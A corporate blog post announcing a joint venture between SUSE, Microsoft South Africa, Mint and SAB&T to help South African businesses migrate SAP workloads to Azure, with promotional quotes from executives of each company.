Joint Venture formed to ensure South African businesses seamlessly migrate to the cloud

SUSE, Microsoft, Mint & SAB&T join forces to help businesses do more with less

Blog by Matthew Lee, Cloud and Strategic Alliances Manager at SUSE

I am very pleased today, as SUSE, Microsoft South Africa, Mint and SAB&T have entered into a local joint venture designed to assist organisations across industry sectors in migrating their SAP workloads to Azure given the imminent arrival of two Microsoft data centres in Africa.

SUSE will be providing the SAP-optimised Linux operating system tuned for Azure with Microsoft the cloud infrastructure provider. Mint will deliver the required Azure expertise and SAB&T will offer the SAP partner skills to support companies with the transition.

This joint venture is significant as it shows companies that the local tools, processes, programmes, and skills are in place for a successful SAP migration when the local Microsoft data centres go live. This partnership between these four experts in their field will provide the comfort levels needed when it comes to running SAP in the cloud – something South African businesses are looking for.

For Carel du Toit, CEO of the Mint Group, this partnership reflects a growing trend to deliver customer value propositions that transform their computing, storage, and communication into utilities that are easily available through cloud resources on an as-needed basis. “Opportunities exist for organisations to look at operationalising their current environments, driving down running costs, and aligning their operational cost model with the actual utilisation requirement for their solutions. Azure is a compelling hosting option for customers who are also making use of Office365 – since their SAP and Office environments would essentially be hosted in the same Azure Regions – enabling deep integration between the systems for workflow and reporting,” he says.

According to Riedwaan Bassadien, Azure Open Source Lead at Microsoft SA, cloud migrations are becoming popular with many organisations as they look to downsize their data centre footprint. “This is an opportunity for IT solution providers in the local ecosystem to help customers move to the cloud and for software vendors and start-ups to deliver cloud native solutions to Africa and the world stage. With the advent of Azure data centre regions in SA, it is seen as a big enabler.”

Tinus Brink, Director of Consulting at SAB&T feels part of this migration entails putting the skills in place to deliver an integrated offering to customers that have decided to enhance their SAP environments for a digital world. “The cloud offers numerous opportunities to deliver enhanced business value. This joint venture is designed to provide a comprehensive and professional offering that removes the challenges of migrating to the cloud, so businesses can remain focused on delivering their strategic objectives,” says Brink.

Given the infrastructure challenges that still exist in Africa, the cloud provides a viable alternative that addresses many business continuity concerns. I believe that leveraging the respective skills of our four organisations will create an enabling environment for companies to easily and cost-effectively move to the Azure-based data centres.

With mission-critical systems such as those delivered through SAP environments, companies do not have the luxury of down-time or losing data. Our joint venture is designed to deliver the best value possible and make the cloud journey an empowering one for business.

According to du Toit, a successful SAP on Azure cloud migration requires a solid partner in terms of the cloud infrastructure, an expert on deploying and configuring SAP, and a reliable and cost-effective operating system to use as a platform between these worlds. “By combining the efforts of Mint (as a Microsoft Cloud Gold Partner), SAB&T (as one of the de facto names in SAP knowledge and training in the South African market), and SUSE’s cost effective, performant, resilient, specially-tailored SAP workloads, we give customers a no-compromise value proposition which covers all the bases,” he says.

Bassadien from Microsoft agrees. “I believe that each party in the joint venture brings something special to the market. It speaks of depth of expertise and high levels of trust between each party as well as trust that our joint customers can rely on. Experienced CIOs and business decision-makers know that there is no one organisation that can give you everything. What we have tried to do here is to bring together a dream team of sorts, for the benefit of our joint customers.”

 

Share with friends and colleagues on social media

Source

WP2Social Auto Publish Powered By : XYZScripts.com